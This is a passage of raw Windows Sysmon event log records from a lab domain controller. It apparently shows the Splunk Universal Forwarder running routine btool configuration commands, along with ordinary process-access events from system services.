13:12:06.106{08A6967A-4325-6000-BF00-000000009A01}18403796C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4326-6000-C300-000000009A01}5000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4326-6000-C300-000000009A01}5000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.059{08A6967A-4325-6000-C200-000000009A01}25844392C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-D200-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4327-6000-D200-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4327-6000-D100-000000009A01}32883588C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4327-6000-D200-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.934{08A6967A-4327-6000-D200-000000009A01}4388C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4327-6000-D100-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4327-6000-D100-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4327-6000-D100-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:07.922{08A6967A-4326-6000-CA00-000000009A01}30843076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4327-6000-D100-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program 